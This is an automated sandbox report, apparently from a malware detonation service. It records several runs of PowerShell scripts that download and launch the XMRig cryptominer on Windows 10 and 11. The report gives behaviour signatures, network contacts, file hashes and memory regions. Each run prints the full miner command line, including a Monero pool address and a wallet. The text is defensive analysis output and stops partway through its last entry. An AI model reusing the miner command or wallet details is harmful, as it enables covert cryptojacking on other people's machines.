memory/2552-113-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-114-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-115-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-116-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-117-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-118-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
290s
Max time network
245s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(29 identical all-N/A rows collapsed to one; the report records no description, indicator, process or target for this rule's hits)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1336 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1336 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1336-0-0x00007FFD77043000-0x00007FFD77045000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqm3fzmu.weh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1336-9-0x00000137F9550000-0x00000137F9572000-memory.dmp
memory/1336-10-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-11-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-12-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-13-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-16-0x00000137F95C0000-0x00000137F95CA000-memory.dmp
memory/1336-15-0x00000137F95D0000-0x00000137F95E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4888-47-0x0000026B3AE90000-0x0000026B3AEB0000-memory.dmp
memory/1336-48-0x00007FFD77043000-0x00007FFD77045000-memory.dmp
memory/4888-50-0x0000026B3AEE0000-0x0000026B3AF00000-memory.dmp
memory/1336-49-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/1336-51-0x00007FFD77040000-0x00007FFD77B02000-memory.dmp
memory/4888-52-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-53-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-55-0x0000026B3AF20000-0x0000026B3AF40000-memory.dmp
memory/4888-54-0x0000026B3AF00000-0x0000026B3AF20000-memory.dmp
memory/4888-56-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-58-0x0000026B3AF00000-0x0000026B3AF20000-memory.dmp
memory/4888-57-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-59-0x0000026B3AF20000-0x0000026B3AF40000-memory.dmp
memory/4888-60-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-61-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-62-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-63-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-64-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-65-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-66-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-67-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-68-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-69-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-70-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-71-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-72-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-73-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-74-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-75-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-76-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-77-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-78-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-79-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-80-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-81-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
memory/4888-82-0x00007FF63BDD0000-0x00007FF63CA03000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
297s
Max time network
254s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(30 identical all-N/A rows collapsed to one; the report records no description, indicator, process or target for this rule's hits)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2468 wrote to memory of 2760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2468 wrote to memory of 2760 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4116,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.144:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 144.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snaaduzr.wcb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
293s
Max time network
307s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2252 wrote to memory of 5088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2252 wrote to memory of 5088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4160 --field-trial-handle=3084,i,4016110471176367543,14287608422419064331,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.36.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.183.117.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.187.202:443 | chromewebstore.googleapis.com | tcp |
| GB | 142.250.187.202:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1rqknnk.dat.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
298s
Max time network
299s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4144 wrote to memory of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4144 wrote to memory of 4924 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xa1uunpq.wom.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
291s
Max time network
304s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4424 wrote to memory of 4240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4424 wrote to memory of 4240 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.162.46.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tje052eb.j50.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
300s
Max time network
305s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
